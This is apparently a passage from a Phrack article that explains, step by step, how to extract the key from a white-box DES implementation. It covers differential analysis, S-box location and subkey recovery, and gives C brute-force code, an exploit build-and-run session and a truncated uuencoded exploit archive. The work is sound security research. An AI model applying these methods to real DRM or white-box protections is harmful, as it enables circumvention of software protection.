+    -> bit 32
+    -> bit 40
+    -> bit 48
+[...]
+  OUT[11] (high) is composed of:
+    -> bit 7
+    -> bit 15
+    -> bit 23
+    -> bit 31
+  OUT[11] (low) is composed of:
+    -> bit 14
+    -> bit 22
+    -> bit 46
+    -> bit 54
+[+] Total nbr of bits involved = 96
+[...]
+---------------------------------------------------------------------------
+
+    So the analysis of the 8 first LUT reveals that each output (OUT[i])
+nibble is linked to exactly 4 input bits. So the 8 first iBox_i are no more
+than an obfuscated linear mapping.
+
+    A good idea is to focus more specifically on the input bits frequency:
+
+---------------------------------------------------------------------------
+$ ./entropy
+[...]
+[+] Nbr of times a bit is used
+  [b_00] 2 [b_01] 1 [b_02] 2 [b_03] 1 [b_04] 2 [b_05] 1 [b_06] 2 [b_07] 1
+  [b_08] 2 [b_09] 1 [b_10] 2 [b_11] 1 [b_12] 2 [b_13] 1 [b_14] 2 [b_15] 1
+  [b_16] 2 [b_17] 1 [b_18] 2 [b_19] 1 [b_20] 2 [b_21] 1 [b_22] 2 [b_23] 1
+  [b_24] 2 [b_25] 1 [b_26] 2 [b_27] 1 [b_28] 2 [b_29] 1 [b_30] 2 [b_31] 1
+  [b_32] 2 [b_33] 1 [b_34] 2 [b_35] 1 [b_36] 2 [b_37] 1 [b_38] 2 [b_39] 1
+  [b_40] 2 [b_41] 1 [b_42] 2 [b_43] 1 [b_44] 2 [b_45] 1 [b_46] 2 [b_47] 1
+  [b_48] 2 [b_49] 1 [b_50] 2 [b_51] 1 [b_52] 2 [b_53] 1 [b_54] 2 [b_55] 1
+  [b_56] 2 [b_57] 1 [b_58] 2 [b_59] 1 [b_60] 2 [b_61] 1 [b_62] 2 [b_63] 1
+$
+---------------------------------------------------------------------------
+
+    The even bits are used exactly twice while odd ones are only used once
+(here odd and even both refer to the position). Or you could say that even
+bits are duplicated in the internal state built after this step.
+
+    Anybody familiar with the DES knows that the IP(X) function of the DES
+gives the internal state L || R where:
+
+    - L is an array composed of the odd bits of X
+    - R is an array composed of the even bits of X
+
+    In an academic WB DES implementation, building the 96 bits state is
+performed using the duplication of even bits (R). This is because these
+bits are necessary as both input of the E-box and output of the DES round
+function (see my previous description of DES). So we have an obvious match
+and it's a clear indication that there is no external encoding applied to
+the input (and as a consequence probably none applied to the output as
+well). More precisely there could still be a bit permutation on both L & R
+bits but it sounds like a silly hypothesis so let's forget about that.
+What would be the point?
+
+                                    ---
+
+   Now let's continue with the differential analysis of the full wb_init().
+This step is much more intuitive. Think about it: if you want to discover
+the nibbles of stage0 (the output of wb_init) influenced by a specific
+input bit then apply wb_init() to two inputs whose only difference is this
+bit. Then calculate the XOR of both results and the non null nibbles are
+the ones which are affected. This was greatly inspired by [R09].
+
+---------------------------------------------------------------------------
+$ ./entropy
+[...]
+[+] Differential cryptanalysis on wb_init()
+    -> b_00 :: 00 04 20 00 00 00 00 00 00 00 00 00
+    -> b_01 :: 00 00 00 40 00 00 00 00 00 00 00 00
+    -> b_02 :: 00 00 00 09 d0 00 00 00 00 00 00 00
+    -> b_03 :: 00 00 00 00 00 00 00 90 00 00 00 00
+    -> b_04 :: 00 00 00 00 00 0e 60 00 00 00 00 00
+    -> b_05 :: 00 00 00 00 00 00 00 00 00 50 00 00
+    -> b_06 :: 80 00 00 00 00 00 00 05 00 00 00 00
+    -> b_07 :: 00 00 00 00 00 00 00 00 00 00 00 b0
+    -> b_08 :: 00 07 00 00 00 00 00 00 01 00 00 00
+    -> b_09 :: 00 00 00 f0 00 00 00 00 00 00 00 00
+    -> b_10 :: 00 00 00 06 00 00 00 00 00 03 00 00
+[...]
+---------------------------------------------------------------------------
+
+    So for even bits there are 2 nibbles affected and only one for odd
+bits. Not only does it confirm our previous hypothesis but it also reveals
+the position (the index in the nibble array) of the bits in the WB internal
+state (up to 1/2 probability for even bits). This is particularly
+interesting when it comes to locate S-box for example ;-)
+
+
+                       Analyzing the first wb_round()
+                       ------------------------------
+
+
+    To analyze this function, one clever trick is to make use of the odd
+bits (L0) and perform a differential analysis.
+
+    Natively, the DES satisfies the following system of equations:
+
+        L1 = R0
+        R1 = L0 [+] f(R0,K0)
+
+        With
+            L0 || R0 being the result of IP(plaintext)
+            K0 being the first subkey
+
+    Let's now consider two plaintexts (A and B). The first one is composed
+of bits all set to 0 (L0_A || R0_A) whereas the second one ((L0_B || R0_B)
+has a weight of 1 and more specifically, its sole bit set to 1 is in L0.
+
+    Remark: While there is only one A, there are obviously 32 possible B.
+    We can thus write thanks to the previous equations:
+
+        L1_A = R0_A = 0
+        R1_A = L0_A [+] f(R0_A,K0) = f(0,K0)
+
+    And
+
+        L1_B = R0_B = 0
+        R1_B = L0_B [+] f(R0_B,K0) = L0_B [+] f(0,K0)
+
+                (Again please excuse the lazy notation)
+
+    This finally gives us:
+
+        DELTA(L1||R1)(A,B) =  ( L1_A [+] L1_B || R1_A [+] R1_B )
+                           =  ( 0 [+] 0 || f(0,K0) [+] L0_B [+] f(0,K0) )
+                           =  ( 0 || L0_B )
+
+    We know that L0_B's weight is 1 so in a native DES the modification of
+one bit in L0 induces the modification of a unique bit in the output of the
+DES round function. In an obfuscated context, this means that only one
+output nibble is modified and calculating DELTA (the result of the so
+called differential analysis if you prefer) is merely a trick to identify
+it easily.
+
+    Now that you've grasped the main idea, let's work on the real WB. Again
+consider plaintexts A and B which give (L0_A || R0_A) and (L0_B || R0_B)
+after IP().
+
+    Because wb_round() includes the E-box and produces a 96 bits output
+state, we now have to consider an additional transformation:
+
+    X (64b) ---> [ wb_init + first wb_round ] ----> Y (96b)
+
+    Here Y is the output of wb_round. Following the design in academic
+publications we can write:
+
+    Y = RP ( L1 || X1 || r1 )     (RP = Random bit Permutation used to hide
+                                        the position of bits in the
+                                        obfuscated output.)
+
+    With:
+        - L1 being R0 (from DES round equation)
+        - X1 being the result of the E-box applied to R1
+        - r1 being the complementary bits such as the set of X1 and r1 is
+          exactly twice R1
+
+    Now let's apply again the differential analysis. It's important to
+remark that RP() and E() are both linear operations as this simplifies
+things. Indeed it's well known that:
+
+        LinearFunc(x [+] y) = LinearFunc(x) [+] LinearFunc(y)
+
+    Putting everything together this gives us:
+
+        DELTA(Y)(a,b) = RP(Y_A) [+] RP(Y_B)
+                      = RP(Y_A [+] Y_B)
+                      = RP(L1_A [+] L1_B || X1_A [+] X1_B
+                                         || r1_A [+] r1_B)
+                      = RP(0 [+] 0 || E(f(0,K0)) [+] E(L0_B [+] f(0,K0))
+                                   || r1_a [+] r1_b)
+                      = RP(0 || E(f(0,K0) [+] L0_B [+] f(0,K0)z)
+                             || r1_A [+] r1_B)
+                      = RP(0 || E(L0_B) || r1_A [+] r1_B)
+
+    If the bit set in L0 is a middle bit then:
+        - Weight(E(L0_B)) = 1 and Weight(r1_A [+] r1_B)) = 1
+    If the bit set in L0 isn't a middle bit then:
+        - Weight(E(L0_B)) = 2 and Weight(r1_A [+] r1_B)) = 0
+
+    In both cases, Weight(RP(0 || E(L0_B) || r1_A [+] r1_B)) = 2, RP having
+no effect on the weight since it only permutes bits. This means that 1 bit
+modification should have a visible impact on 'at most' 2 nibbles. 'at most'
+and not 'exactly' because with the effect of RP() the two bits could be
+located in the same nibble.
+
+    Let's see if we are right:
+
+---------------------------------------------------------------------------
+   b_01 :: 00 05 d0 00 00 00 00 00 00 00 00 00  <-- 2 modified nibbles
+   b_03 :: 00 00 00 03 60 00 00 00 00 00 00 00  <-- 2 modified nibbles
+   b_05 :: 00 00 00 00 00 04 e0 00 00 00 00 00  <-- 2 modified nibbles
+   b_07 :: 90 00 00 00 00 00 00 08 00 00 00 00  ...
+   b_09 :: 00 0b 00 00 00 00 00 00 05 00 00 00
+   b_11 :: 00 00 00 0f 00 00 00 00 00 08 00 00
+   b_13 :: 00 00 00 00 00 0d 00 00 00 00 0f 00
+   b_15 :: 00 00 00 00 00 00 00 0f 00 00 00 06
+   b_17 :: 00 04 00 00 00 00 00 00 0c 00 00 00
+   b_19 :: 00 00 00 09 00 00 00 00 00 0f 00 00
+   b_21 :: 00 00 00 00 00 08 00 00 00 00 06 00
+   b_23 :: 00 00 00 00 00 00 00 0d 00 00 00 08
+   b_25 :: 08 d0 00 00 00 00 00 00 00 00 00 00
+   b_27 :: 00 00 04 20 00 00 00 00 00 00 00 00
+   b_29 :: 00 00 00 00 05 80 00 00 00 00 00 00
+   b_31 :: 00 00 00 00 00 00 04 20 00 00 00 00
+   b_33 :: 02 70 00 00 00 00 00 00 00 00 00 00
+   b_35 :: 00 00 0c f0 00 00 00 00 00 00 00 00
+   b_37 :: 00 00 00 00 0d b0 00 00 00 00 00 00
+   b_39 :: 00 00 00 00 00 00 0f a0 00 00 00 00
+   b_41 :: 0c 00 00 00 00 00 00 00 0f 00 00 00
+   b_43 :: 00 00 0d 00 00 00 00 00 00 02 00 00
+   b_45 :: 00 00 00 00 09 00 00 00 00 00 05 00
+   b_47 :: 00 00 00 00 00 00 03 00 00 00 00 03
+   b_49 :: 0f 00 00 00 00 00 00 00 0d 00 00 00
+   b_51 :: 00 00 06 00 00 00 00 00 00 03 00 00
+   b_53 :: 00 00 00 00 0b 00 00 00 00 00 0c 00
+   b_55 :: 00 00 00 00 00 00 02 00 00 00 00 01
+   b_57 :: b0 00 00 00 00 00 00 0c 00 00 00 00
+   b_59 :: 00 03 60 00 00 00 00 00 00 00 00 00
+   b_61 :: 00 00 00 0e 40 00 00 00 00 00 00 00
+   b_63 :: 00 00 00 00 00 0b f0 00 00 00 00 00
+---------------------------------------------------------------------------
+
+    And that's exactly what we were expecting :) Well to be honest, I first
+observed the result of the differential analysis, then remarked a 'strange'
+behavior related to the odd bits and finally figured out why using maths ;)
+
+   One cool thing with this situation is that we can easily leak the
+position of the specific S-Boxes inside the T-Boxes. First let's compare
+the differential analysis of even bits 28,36,52,60 and of odd bit 1:
+
+---------------------------------------------------------------------------
+   b_01 :: 00 05 d0 00 00 00 00 00 00 00 00 00
+   b_28 :: 0d 75 dd 00 00 00 04 20 0f d2 00 00
+   b_36 :: 0c 05 d0 00 09 00 04 20 cf 00 05 00
+   b_52 :: 00 05 d0 09 00 00 00 00 90 0f 00 00
+   b_60 :: 0c 05 d6 09 00 00 02 00 3f 0d 00 01
+---------------------------------------------------------------------------
+
+    Obviously setting these even bits one by one induces the same
+modification (amongst others) as setting the odd bit 1 (nibbles 01L (0x5)
+and 02H (0xd)) so there must be some kind of mathematical link between them
+because the other bits do not have such property.
+
+
+                             Playing with Sbox
+                             ------------------
+
+
+    The reason behind this behavior is very simple to explain. But first,
+let's take back the example of plaintext 'A' (null vector):
+
+    We know that:
+
+    R1_A = L0_a [+] P(S1[0 [+] k0] || S2[0 [+] k1] || ... || S8[0 [+] k7])
+    R1_A = 0    [+] P(S1[k0]       || S2[k0]       || ... || S8[k7])
+    R1_A = P( S1[k0] || S2[k1] || ... || S8[k7] )
+
+    Where:
+        The ki being 6 bits vectors (0 <= i < 8)
+        K0 = k0 || k1 || k2 ... || k7
+
+    Thus in the case of plaintext 0 (A), R1_A is the permutation of the
+Sbox output whose inputs are the bits of the first subkey.
+
+    Now let us focus on 1 of the 4 bits generated by an Sbox S (which could
+be any of the 8). We do not know its value (b) but when the P-box is
+applied it will be located in a particular nibble as illustrated below:
+
+
+    R1_A = f(R0,K0) = ???? ?b?? ???? ???? ???? ???? ???? ????
+
+                            ^
+                            |__  The bit
+
+                      <------------------------------------->
+                            (4bits x 8) = 32 bits state
+
+
+    Because a WB DES implementation is working with a duplicated Rx this
+will give us the following internal state:
+
+               ... ??b? ???? ???? ???b ...
+
+                     ^               ^
+                     |               |
+                     --------------------  b is duplicated
+
+               <------------------------->
+                         96 bits state
+
+
+    Now following what was explained previously with odd bits, out of the
+32 possible B, one of them will affect b when L0_B is XORed with f(0,K0)
+
+    So considering a 96 bits internal state inside the WB, this gives us:
+
+               ... ??a? ???? ???? ???a ...
+
+               With:
+                   a = b [+] 1
+
+    As a result, the differential between A and B would be:
+
+               ... ??b? ???? ???? ???b ...   (from A)
+
+                          [+]
+
+               ... ??a? ???? ???? ???a ...   (from B)
+
+                           =
+
+               ... ??1? ???? ???? ???1 ...  ( because a [+] b
+                                                    = a [+] a [+] 1
+                                                    = 1             )
+
+    From now on, we will call this differential our 'witness' and by
+extension, the two nibbles where b=1 the 2 witness nibbles.
+
+
+                         Playing with the witness
+                         ------------------------
+
+
+    Now imagine that we're using another plaintext (X) with weight 1 and
+whose weight is in one of the 6 possible bits influencing Sbox S. There are
+two possible situations:
+
+        - S still produces b
+        - S now produces b+1
+
+    If we perform a differential analysis between X and A (null vector)
+this gives us:
+
+    case 1:
+    =======
+
+               ... ??b? ???? ???? ???b ...   (from A)
+
+                          [+]
+
+               ... ??b? ???? ???? ???b ...   (from X)
+
+                           =
+
+               ... ??0? ???? ???? ???0 ...   <-- useless output
+
+    case 2:
+    =======
+
+               ... ??b? ???? ???? ???b ...   (from A)
+
+                          [+]
+
+               ... ??a? ???? ???? ???a ...   (from X)
+
+                           =
+
+               ... ??1? ???? ???? ???1 ...   <-- witness vector :)))
+
+
+    So case 2 is perfect because it gives us a distinguisher. We can test
+all 32 possible X (each of them having a different even bit set) and
+observe the ones which produce the witness vector associated with b.
+
+    This is exactly what we did implicitly when we discovered the link
+between bits 28, 36, 52 and 60. Or if you're lost let's say that we've just
+discovered something huge: the bits 28, 36, 52 and 60 are the input of the
+same Sbox and bit 1 is one of the output of this Sbox. At this point the
+protection took a heavy hit.
+
+    Remark: The first subkey is modifying the input sent to the Sbox. As a
+consequence the relation previously found is "key dependent". This will be
+of importance later, keep reading!
+
+
+                               Going further
+                               -------------
+
+
+    Let's think. At this point and thanks to our analysis of wb_init()
+we're almost sure that there is no external encoding applied to the input.
+So there should be a match between our practical results and the
+theoretical relations in the original DES algorithm. To verify my theory, I
+wrote a little script to compute the positions of the bits involved with
+each Sbox:
+
+---------------------------------------------------------------------------
+$ ./bitmapping.py
+ [6, 56, 48, 40, 32, 24]    <-- Sbox 1
+ [32, 24, 16, 8, 0, 58]     <-- Sbox 2
+ [0, 58, 50, 42, 34, 26]
+ [34, 26, 18, 10, 2, 60]
+ [2, 60, 52, 44, 36, 28]    <-- Sbox 5
+ [36, 28, 20, 12, 4, 62]
+ [4, 62, 54, 46, 38, 30]
+ [38, 30, 22, 14, 6, 56]    <-- Sbox 8
+---------------------------------------------------------------------------
+
+    Oh interesting so Sbox 5 seems to match with our practical result.
+Going deeper, we need to check if bit 01 is involved with this Sbox. Again
+I wrote another script to compute the position of odd bits involved with
+the Sbox in the original DES and this gives us:
+
+---------------------------------------------------------------------------
+$ ./sbox.py | grep 'SBOX 5'
+    bit 41 XORED with bit 00 of SBOX 5 (19)
+    bit 01 XORED with bit 03 of SBOX 5 (16)
+    bit 19 XORED with bit 02 of SBOX 5 (17)
+    bit 63 XORED with bit 01 of SBOX 5 (18)
+---------------------------------------------------------------------------
+
+    So bit 01 is indeed involved. However let's try to be careful. In
+cryptanalysis it's easy to be fooled, so let's make extra checks. For
+example can we link a subset of even bits {2, 28, 36, 44, 52, 60} with bit
+19 of the same Sbox?
+
+---------------------------------------------------------------------------
+        19 :: 00 00 00 09 00 00 00 00 00 0f 00 00
+         2 :: 0c 00 06 00 00 0b f2 60 0f 03 00 01
+        28 :: 0d 75 dd 00 00 00 04 20 0f d2 00 00
+        36 :: 0c 05 d0 00 09 00 04 20 cf 00 05 00
+        44 :: 00 00 00 09 00 0b f0 00 20 0f 00 00
+        52 :: 00 05 d0 09 00 00 00 00 90 0f 00 00
+        60 :: 0c 05 d6 09 00 00 02 00 3f 0d 00 01
+---------------------------------------------------------------------------
+
+    Bit 19 is linked to bit 44 and 52 => YES. At this point, we should
+check automatically that the bit relations are satisfied for all the Sbox
+but it's tedious. That's the problem :-P Because I was lazy, I manually
+checked all the relations. Fortunately with the help of scripts, this only
+took me a couple of minutes and it was a 100% match. Again, this proves
+nothing but as I said earlier, we're working with guesses.
+
+
+         Towards a perfect understanding of differential analysis
+         --------------------------------------------------------
+
+
+    Didn't you notice something particular with bit 02, 28 and 60? Well the
+'impacted' nibbles were neither 0 nor a witness nibble. For example
+consider bit 60:
+
+---------------------------------------------------------------------------
+        19 :: 00 00 00 09 00 00 00 00 00 0f 00 00
+        60 :: 0c 05 d6 09 00 00 02 00 3f 0d 00 01
+---------------------------------------------------------------------------
+
+    The first impacted nibble '0x9' is a good one (witness nibble) but the
+second one is neither '0x0' nor '0xf' (witness). How is that possible?
+
+    Well the answer lies in both:
+        - the (non)-middle bits
+        - the P-box
+
+    Indeed if you consider the bits sent to Sbox 5, you have to know that:
+        - bits 02 and 60 are sent to both Sbox 4 & 5
+        - bits 52 and 44 are sent to Sbox 5
+        - bits 36 and 28 are sent to both Sbox 5 & 6
+
+    So when 1 non-middle bit is set, this will impact the output of 2 Sbox
+and we're unlucky, the P-box will have the unfortunate effect of setting
+them in the same nibble, hence the difference observed.
+
+
+----[ 6.3 - Recovering the first subkey
+
+
+    If the relations observed are 'key dependent', considering the fact
+that the S-Boxes are known (which means unmodified otherwise this would be
+cheating :p) then isn't this an indirect leak on the key itself that could
+be transformed in a key recovery? Oh yes it is :-)
+
+
+                            First cryptanalysis
+                            -------------------
+
+
+    The main idea is really simple: we know that for a given subkey,
+several unitary vectors (plaintexts of weight 1) will produce the same
+output bit.
+
+    Let's take again the previous case. We have:
+
+
+                  .------.------.------.-----.-----.------.
+                  | b_02 | b_60 | b_52 |b_44 |b_36 | b_28 |
+                  '------'------'------'-----'-----'------'
+                                    .....
+                                    . + .
+                                    .....
+                  .------.------.------.-----.-----.------.
+                  | k24  | k25  | k26  | k27 | k28 | k29  |
+                  '------'------'------'-----'-----'------'
+                                      |
+                                      v
+                            *********************
+                            *       Sbox 5      *
+                            *********************
+                                      |
+                                      v
+                        .------.------.------.-----.
+                        |  y0  |  y1  |  y2  | y3  |
+                        '------'------'------'-----'
+
+
+   Let us consider bit 01. We know that it will be XORed to y2 so from the
+differential analysis we can derive the set of relations:
+
+[ k24 [+] 0, k25 [+] 1, k26 [+] 0, k27 [+] 0, k28 [+] 0, k29 [+] 0 ] => b
+[ k24 [+] 0, k25 [+] 0, k26 [+] 1, k27 [+] 0, k28 [+] 0, k29 [+] 0 ] => b
+[ k24 [+] 0, k25 [+] 0, k26 [+] 0, k27 [+] 0, k28 [+] 1, k29 [+] 0 ] => b
+[ k24 [+] 0, k25 [+] 0, k26 [+] 0, k27 [+] 0, k28 [+] 0, k29 [+] 1 ] => b
+
+   So amongst all possible sets {k24,k25,k26,k27,k28,k29}, only a few of
+them (including the one from the real subkey) will satisfy the relations.
+Testing all possible sets (there are 2^6 = 64 of them) will give us 2 lists
+because we do not know if b=1 or b=0 so we have to consider both cases.
+
+   Applying this technique to both y0, y1, y2 and y3 will allow to filter
+efficiently the number of possible candidates as we will only consider
+those present in all lists. The success of this cryptanalysis is highly
+dependent on the number of relations that we will be able to create for a
+particular S-Box. Practically speaking, this is sufficient to recover the
+first subkey as the complexity should be far below 2^48. Should be? Yes I
+didn't test it... I found even better.
+
+
+                         Immediate subkey recovery
+                         -------------------------
+
+
+    As I said above, our success is dependent of the number of equations so
+improving the cryptanalysis can be done by finding ways to increase this
+number. There are two obvious ways to do that:
+
+        - There may exist combinations of input bits other than unitary
+          vectors (weight > 1) which can produce the witness nibbles in a
+          differential analysis.
+        - If the impacted nibbles are both 0x0 then this gives us a new
+          relation where expected output bit is b [+] 1
+
+   Practically speaking this gives us the following result for Sbox5 and
+bit 01:
+
+---------------------------------------------------------------------------
+$ ./exploit
+[...]
+        { 1 0 0 0 0 0 } = { 1 }   <-- dumping relations for S5 & bit 01
+        { 0 1 0 0 0 0 } = { 0 }
+        { 1 1 0 0 0 0 } = { 0 }
+        { 0 0 1 0 0 0 } = { 0 }
+        { 1 0 1 0 0 0 } = { 1 }
+        { 0 1 1 0 0 0 } = { 1 }
+        { 1 1 1 0 0 0 } = { 1 }
+        { 0 0 0 1 0 0 } = { 1 }
+        { 1 0 0 1 0 0 } = { 0 }
+        { 0 1 0 1 0 0 } = { 0 }
+        { 1 1 0 1 0 0 } = { 1 }
+        { 0 0 1 1 0 0 } = { 1 }
+        { 1 0 1 1 0 0 } = { 0 }
+        { 0 1 1 1 0 0 } = { 1 }
+        { 1 1 1 1 0 0 } = { 0 }
+        { 0 0 0 0 1 0 } = { 0 }
+        { 1 0 0 0 1 0 } = { 1 }
+        { 0 1 0 0 1 0 } = { 0 }
+        { 1 1 0 0 1 0 } = { 0 }
+        { 0 0 1 0 1 0 } = { 1 }
+        { 1 0 1 0 1 0 } = { 0 }
+        { 0 1 1 0 1 0 } = { 0 }
+        { 1 1 1 0 1 0 } = { 1 }
+        { 0 0 0 1 1 0 } = { 0 }
+        { 1 0 0 1 1 0 } = { 0 }
+        { 0 1 0 1 1 0 } = { 1 }
+        { 1 1 0 1 1 0 } = { 0 }
+        { 0 1 0 1 0 1 } = { 1 }
+
+[...]
+
+        [ key candidate is 31]
+---------------------------------------------------------------------------
+
+    The cryptanalysts have the habit to always evaluate the complexity of
+their attacks but in this case let's say that it's useless. Only one subkey
+appeared to be valid out of the 2^48 possible ones.
+
+
+----[ 6.4 - Recovering the original key
+
+
+    Now that we've retrieved the first subkey, our goal is almost reached.
+So how do we retrieve the secret key? Well DES subkeys can be seen as
+truncated permutations of the original key. This means that we now have 48
+out of the 56 bits of the original key.
+
+    I could explain the key scheduling mechanism of the DES, but it's
+useless as the only important thing is to be able to reverse the
+permutation. This is done easily thanks to the following python
+manipulation applied to the sKMap1 array, itself being shamelessly ripped
+from [13]:
+
+---------------------------------------------------------------------------
+>>> InvsKMap1 = [ -1 for i in xrange(64) ]
+>>> for x in xrange(len(InvsKMap1)):
+...     if 7-x%8 == 0:
+...             InvsKMap1[x] = -2
+...
+>>> for x in xrange(64):
+...     if x in sKMap1:
+...             InvsKMap1[x] = sKMap1.index(x)
+...
+>>> InvsKMap1
+[19, 8, 12, 29, 32, -1, -1, -2, 9, 0, -1, -1, 44, 43, 40, -2, 5, 22, 10,
+41, 37, 24, 34, -2, 15, 14, 21, 25, 35, 31, 47, -2, 6, 2, 13, 20, 28, 38,
+26, -2, 23, 11, -1, 16, 42, -1, 30, -2, 4, -1, 1, -1, 33, 27, 46, -2, 7,
+17, 18, 3, 36, 45, 39, -2]
+>>>
+---------------------------------------------------------------------------
+
+    Here is the resulting array:
+
+        char InvsKMap1[64] = {
+            19,  8, 12, 29, 32, -1, -1, -2,
+             9,  0, -1, -1, 44, 43, 40, -2,
+             5, 22, 10, 41, 37, 24, 34, -2,
+            15, 14, 21, 25, 35, 31, 47, -2,
+             6,  2, 13, 20, 28, 38, 26, -2,
+            23, 11, -1, 16, 42, -1, 30, -2,
+             4, -1,  1, -1, 33, 27, 46, -2,
+             7, 17, 18,  3, 36, 45, 39, -2
+            };
+
+    My exploit uses this array to build an original key out of both the
+subkey bits and an 8 bits vector. '-1' is set for a bit position where the
+value has to be guessed. There are 8 such positions, and for each of them,
+a bit is taken from the 8 bits vector. '-2' means that the bit can be
+anything.  Indeed the most significant bits (the so-called parity bits) of
+the 8 bytes key array are never taken into account (hence the well known
+8 x 7 = 56 bits keylength).
+
+    Now the only remaining thing to do is to guess these 8 missing bits.
+Obviously for each guess you will generate an original key 'K' and test it
+against a known couple of input/output generated by the white-box. The
+whole operation was implemented below:
+
+---------------------------------------------------------------------------
+void RebuildKeyFromSk1(uchar *dst, uchar *src, uchar lastbits)
+{
+        int i,j;
+        char *plastbits = (char *)&lastbits;
+
+        memset(dst, 0, DES_KEY_LENGTH);
+        for(i=0,j=0; i<64; i++)
+        {
+                // Parity bit
+                if(InvsKMap1[i] == -2)
+                        continue;
+
+                // Bit is guessed
+                else if(InvsKMap1[i] == -1)
+                {
+                        if(GETBIT(plastbits,j))
+                                SETBIT(dst,i);
+                        j++;
+                }
+                // Bit is already known
+                else
+                {
+                        if(GETBIT(src, InvsKMap1[i]))
+                                SETBIT(dst,i);
+                }
+        }
+        return;
+}
+
+[...]
+
+        const_DES_cblock in = "\x12\x32\xe7\xd3\x0f\xf1\x29\xb3";
+        const_DES_cblock expected = "\xa1\x6b\xd2\xeb\xbf\xe1\xd1\xc2";
+        DES_cblock key;
+        DES_cblock out;
+        DES_key_schedule ks;
+
+        for(missing_bits=0; missing_bits<256; missing_bits++)
+        {
+            RebuildKeyFromSk1(key, sk, missing_bits);
+            memset(out, 0, sizeof out);
+            DES_set_key(&key, &ks);
+            DES_ecb_encrypt(&in, &out, &ks, DES_ENCRYPT);
+
+            if(!memcmp(out,expected,DES_BLOCK_LENGTH))
+            {
+                printf("[+] Key was found!\n");
+                [...]
+            }
+        }
+---------------------------------------------------------------------------
+
+    The whole cryptanalysis of the white-box is very effective and allows
+us to retrieve a key in a few ms. More precisely it retrieves _1_ of the
+256 possible 8 bytes key ;)
+
+---------------------------------------------------------------------------
+$ tar xfz p68-exploit.tgz; cd p68-exploit
+$ wget http://homes.esat.kuleuven.be/~bwyseur/research/wbDES
+$ md5sum wbDES
+b9c4c69b08e12f577c91ec186edc5355  wbDES   # you can never be sure ;-)
+$ for f in scripts/*.gdb; do gdb -x $f; done > /dev/null  # is quite long
+$ make
+gcc -c wb_init.c -O3 -Wall
+gcc -c wb_round.c -O3 -Wall
+gcc -c wb_final.c -O3 -Wall
+gcc exploit.c *.o -O3 -Wall -o exploit -lm -lcrypto
+gcc wb_main.c *.o -O3 -Wall -o wbdes.try
+gcc entropy.c -o entropy -lm
+$ ./exploit
+
+[+] Number of possible candidates = 256
+	-> Required computation is 2^(8) * DES()
+
+[+] Key was found!
+	-> Missing bits: 0x3d
+	-> Key: '02424626'
+
+$
+---------------------------------------------------------------------------
+
+    And that's it! So the key was bf-able after all ;>
+
+
+--[ 7 - Conclusion
+
+
+    Nowadays there are a lot of white-box protections in the wild (DRM but
+not only) using either academic designs or their improvements. Each of them
+is an interesting challenge which is why you may want to face it one day.
+This paper is not ground breaking nor even relevant for the average
+cryptographer, the cryptanalysis of the naked DES being covered in many
+papers including [R16]. I wrote it however with the hope that it would give
+you an overview of what practical white-box cracking could be. I hope you
+enjoyed it :)
+
+    Feel free to contact me for any question related to this paper using
+the mail alias provided in the title of the paper.
+
+
+--[ 8 - Gr33tz
+
+
+    Many (randomly ordered) thanks to:
+
+    - the #f4lst4ff crypt0/b33r team for introducing me to the concept of
+      white-box a few years ago.
+    - Jb & Brecht for their implementations which gave me a lot of fun :)
+    - X, Y, Z who will remain anonymous but nonetheless helped me to
+      improve _significantly_ the paper. If you managed to understand a few
+      things out of this "blabla" then you must thank them (and especially
+      X). I owe you big time man :)
+    - asciio authors because without this tool I would never have found the
+      courage to write the paper
+    - The Phrack Staff for publishing it
+
+
+--[ 9 - References
+
+
+[R01] http://en.wikipedia.org/wiki/Feistel_cipher
+[R02] http://2009.hack.lu/index.php/ReverseChallenge
+[R03] http://baboon.rce.free.fr/index.php?post/2009/11/20/
+      HackLu-Reverse-Challenge
+[R04] http://www.whiteboxcrypto.com
+[R05] "Cryptanalysis of a White Box AES Implementation", Billet et al.
+      http://bo.blackowl.org/papers/waes.pdf
+[R06] "Digital content protection: How to crack DRM and make them more
+      resistant", Jean-Baptiste Bedrune
+      http://esec-lab.sogeti.com/dotclear/public/publications/
+      10-hitbkl-drm.pdf
+[R07] "White-Box Cryptography and an AES Implementation", Eisen et al.
+      http://www.scs.carleton.ca/%7Epaulv/papers/whiteaes.lncs.ps
+[R08] "White-Box Cryptography and SPN ciphers", Schelkunov
+      http://eprint.iacr.org/2010/419.pdf
+[R09] "A White-box DES Implementation for DRM Applications", Chow et al.
+      http://www.scs.carleton.ca/%7Epaulv/papers/whitedes1.ps
+[R10] "White-Box Cryptography", James Muir, Irdeto
+      http://www.mitacs.ca/events/images/stories/focusperiods/
+      security-presentations/jmuir-mitacs-white-box-cryptography.pdf
+[R11] http://search.cpan.org/dist/App-Asciio/lib/App/Asciio.pm#NAME
+[R12] http://dhost.info/pasjagor/des/start.php
+[R13] "Cryptography: Theory and Practice", D. Stinson, 1st edition
+[R14] "Clarifying Obfuscation: Improving the Security of White-Box
+      Encoding", Link et al.
+      http://eprint.iacr.org/2004/025.pdf
+[R15] "White-Box Cryptography" (PhD thesis), B. Wyseur
+      https://www.cosic.esat.kuleuven.be/publications/thesis-152.pdf
+[R16] "Attacking an obfuscated cipher by injecting faults", Jacob et al.
+      http://www.cs.princeton.edu/~mjacob/papers/drm1.pdf
+[R17] "Cryptanalysis of White-Box DES Implementations with Arbitrary
+      External Encodings", B. Wyseur
+      http://eprint.iacr.org/2007/104.pdf
+
+
+--[ 10 - Appendix
+
+
+begin 644 p68-exploit.tgz
+M'XL(``$N74\``^Q<>W,:Q[+WO_`I)DY9`1G)^P9)H)0?<J*R8[DLY22G$*$6
+M6*05CR7L8J/CH_O9;W?/8V<?2,B5W%OW015>=J:GNZ>GIZ?G-R,OO-9>L%Y,
+MHS!Y\>1O^ACP:;HN/LVF:^I/^7EBFDVK:5E>T_&>&/#BF$^8^W<II']6<>(O
+M&7L2W\:3^^@>JO\?^EEHX_^+/PG&X33XJV7@`'N.LW'\7<^C\?>:INDUP4],
+MVS&:3YCQ5RM2]OD_/O[^='K(HL%-S(07L"^#41`GRUL6S)-EM+BM5K'ZL%JY
+M&@[9WA#J^^$\3/;AY<QF>[\!![UN&:WFHTV5XW#N3S.552'V4,K?'_(&ZI7M
+M[D=I`[87*4WWIC/X#I>WBR2J5J7>ARAHYH=SR4F]%CE1FWUH!'KPWA[*;BL]
+MY"M)YB\HN3J<!OX<S+*<$5]9I5A*-:O+P)]FB*^K_]VCGG[T^:],_A?+N'_^
+M.YZ1SG_7L1R<_QXL"?\___\+/M^'\^%T-0I8.TY&8;1_?5S-%$W#0:$LG"?Y
